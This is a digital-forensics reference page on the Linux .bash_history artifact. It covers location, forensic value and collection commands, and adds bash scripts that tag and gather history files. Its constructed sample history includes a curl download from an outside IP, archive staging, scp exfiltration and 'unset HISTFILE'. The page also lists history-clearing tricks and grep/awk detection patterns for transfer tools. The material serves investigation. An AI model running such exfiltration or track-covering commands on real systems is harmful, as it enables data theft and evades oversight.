.bash_history (Shell History)

Linux | Execution Evidence | Disk Image

Location

/home/<username>/.bash_history and /root/.bash_history

Description

Per-user command history file recording commands entered in interactive Bash sessions. Bash writes the file when the session exits (earlier only if the session runs history -a or history -w, often from PROMPT_COMMAND), so a session that is still open or was killed may have left nothing on disk yet. Entries carry no timestamps unless HISTTIMEFORMAT was set, in which case each command is preceded by a line of the form #<epoch>. Other shells and tools keep equivalent files in the same home directory, for example .zsh_history, .ash_history, .sh_history (ksh), .python_history, .mysql_history and .psql_history.

Forensic Value

Shell history provides a direct record of attacker commands: reconnaissance (whoami, id, uname -a), lateral movement (ssh, scp), data staging (tar, zip) and exfiltration (curl, wget, scp to external IPs). Sophisticated attackers clear or suppress history (unset HISTFILE, export HISTFILE=/dev/null, HISTSIZE=0, history -c, or prefixing commands with a space when HISTCONTROL includes ignorespace), but partially written files and per-command timestamps (present only if HISTTIMEFORMAT was set) often survive, and a history file that is empty or unusually small for an account with recent logins is itself a lead. Without HISTTIMEFORMAT the file records order only, not time; correlate it with wtmp, auth logs and the file's own mtime, which marks the last time a session wrote it. Check every account that has a home directory in /etc/passwd, including service accounts whose homes live outside /home (for example under /var/lib).
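The triage described above, as an added shell example that is not part of the original page: it parses a collected history file into epoch, tag and command, recognising both bash #<epoch> stamp lines (present only when HISTTIMEFORMAT was set) and zsh EXTENDED_HISTORY entries, and tags each command with the attack phase it most resembles. The sample history, host paths, account names and IPs are constructed for the example; the tag rules are heuristics, not verdicts.

```bash
#!/bin/bash
# Added example (not part of the original page): turn a collected history
# file into "epoch|tag|command" records and tag commands by the attack phases
# the text describes. Understands bash "#<epoch>" stamp lines, which exist
# only if HISTTIMEFORMAT was set, and zsh EXTENDED_HISTORY lines of the form
# ": <epoch>:<duration>;<command>". Tags are heuristics, not verdicts.

# triage_history FILE
# Prints one line per command: epoch ("-" when the command had no stamp),
# tag (ANTIFORENSIC, RECON, LATERAL, STAGING, TRANSFER, or empty), command.
triage_history() {
  awk '
    /^#[0-9]+$/ { ts = substr($0, 2); next }        # bash timestamp line
    /^: [0-9]+:[0-9]+;/ {                            # zsh extended entry
      ts = substr($0, 3); sub(/:.*/, "", ts)
      sub(/^: [0-9]+:[0-9]+;/, "")
    }
    {
      line = " " $0 " "
      w = ($1 == "sudo") ? $2 : $1                   # command word, sudo stripped
      tag = ""
      if (line ~ /HISTFILE|HISTSIZE=0|history -c|shred |rm .*_history/) tag = "ANTIFORENSIC"
      else if (w ~ /^(whoami|id|uname|hostname|w|last|ps|netstat|ss|ip|ifconfig)$/) tag = "RECON"
      else if (line ~ / ssh /) tag = "LATERAL"
      else if (line ~ / (tar|zip|7z|gzip|xz|zstd) /) tag = "STAGING"
      else if (line ~ / (curl|wget|scp|sftp|rsync|nc|ncat|socat) /) tag = "TRANSFER"
      stamp = (ts == "") ? "-" : ts
      printf "%s|%s|%s\n", stamp, tag, $0
      ts = ""
    }
  ' "$1"
}

# make_sample_history FILE: constructed bash history (hypothetical host, IPs
# from the 203.0.113.0/24 documentation range). The first entry predates
# HISTTIMEFORMAT being set, so it has no stamp.
make_sample_history() {
  cat > "$1" <<'EOF'
ls -la
#1700000000
whoami
#1700000010
sudo id
#1700000020
curl -s http://203.0.113.5/x.sh -o /tmp/x.sh
#1700000030
tar czf /tmp/.cache.tgz /home/alice/Documents
#1700000040
scp /tmp/.cache.tgz user@203.0.113.5:/data/
#1700000050
ssh backup@10.0.0.7
#1700000060
unset HISTFILE
EOF
}

# Run directly: triage the constructed sample.
sample=$(mktemp)
make_sample_history "$sample"
triage_history "$sample"
rm -f "$sample"
```

Feed it a file collected with the commands below (triage_history /forensics/output/root/.bash_history) and sort or filter on the tag column; a stamped ANTIFORENSIC entry gives you the moment the attacker tried to cover tracks, and everything after an unset HISTFILE is by definition missing from this artifact.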

Tools Required

cat, grep, find, strings

Collection Commands

find

find /home /root -type f -name ".*_history" -exec cp -p --parents {} /forensics/output/ \;

cat

cat /root/.bash_history > /forensics/output/root_bash_history.txt

grep

grep -nwE "curl|wget|ssh|scp|nc|base64" /home/*/.bash_history /root/.bash_history > /forensics/output/suspicious_cmds.log

find

find /home /root -type f \( -name ".zsh_history" -o -name ".python_history" \) -print0 | xargs -0 -I{} cp -p --parents {} /forensics/output/
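The find commands above only search /home and /root, which misses service accounts whose home directories sit elsewhere. The following is an added shell example, not a command from the original page: it reads home directories from a passwd file, lists every .*_history file directly under each, and copies them into an output tree with their paths and timestamps preserved. The ROOT argument lets it run against a mounted image as well as a live system; the passwd entries, paths and history contents in make_fake_tree are constructed sample data.

```bash
#!/bin/bash
# Added example (not from the original page): enumerate and collect shell
# history for every account in a passwd file rather than only under /home
# and /root, so service accounts with homes such as /var/lib/postgresql are
# not missed. Arguments let it run against a mounted image or a test tree.

# list_history_files PASSWD_FILE [ROOT]
# Prints every file named .*_history directly under each account's home.
# ROOT is a prefix for a mounted image (e.g. /mnt/evidence); empty for live.
list_history_files() {
  passwd="$1"
  root="${2:-}"
  awk -F: '$6 != "" && $6 != "/" { print $6 }' "$passwd" | sort -u |
  while IFS= read -r home; do
    dir="$root$home"
    [ -d "$dir" ] || continue                 # nologin accounts often have none
    find "$dir" -maxdepth 1 -type f -name '.*_history' 2>/dev/null
  done
}

# collect_history_files PASSWD_FILE ROOT OUTDIR
# Copies each history file into OUTDIR, keeping the original path layout and
# timestamps (cp -p) so file mtimes remain usable as evidence.
collect_history_files() {
  list_history_files "$1" "$2" | while IFS= read -r f; do
    rel="${f#"$2"}"                           # path relative to ROOT
    mkdir -p "$3$(dirname "$rel")"
    cp -p "$f" "$3$rel"
  done
}

# make_fake_tree DIR: constructed sample image (hypothetical accounts, paths
# and history lines) so the collection can be exercised offline.
make_fake_tree() {
  d="$1"
  printf '%s\n' \
    'root:x:0:0:root:/root:/bin/bash' \
    'alice:x:1000:1000::/home/alice:/bin/zsh' \
    'postgres:x:113:120::/var/lib/postgresql:/bin/bash' \
    'nobody:x:65534:65534::/nonexistent:/usr/sbin/nologin' \
    > "$d/passwd"
  mkdir -p "$d/root" "$d/home/alice" "$d/var/lib/postgresql"
  printf 'id\n' > "$d/root/.bash_history"
  printf ': 1700000000:0;whoami\n' > "$d/home/alice/.zsh_history"
  printf 'psql -c "copy users to stdout"\n' > "$d/var/lib/postgresql/.bash_history"
  printf 'select 1;\n' > "$d/var/lib/postgresql/.psql_history"
}

# Run directly: collect from the constructed tree and show what was gathered.
demo=$(mktemp -d)
make_fake_tree "$demo"
collect_history_files "$demo/passwd" "$demo" "$demo/forensics_output"
find "$demo/forensics_output" -type f
rm -rf "$demo"
```

Against a mounted image, call collect_history_files /mnt/evidence/etc/passwd /mnt/evidence /forensics/output; on a live host use /etc/passwd with an empty ROOT. The passwd file is the authoritative list of home directories, so an account with a home under /opt or /srv is collected without you having to know it exists.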

Collection Constraints

  • Paths and log sources vary by distribution, init system, logging stack, and installed packages. Validate the active distro and service set before treating absence as meaningful.

MITRE ATT&CK Techniques

T1059.004 (Command and Scripting Interpreter: Unix Shell), T1552.003 (Unsecured Credentials: Bash History), T1083 (File and Directory Discovery), T1070.003 (Indicator Removal: Clear Command History)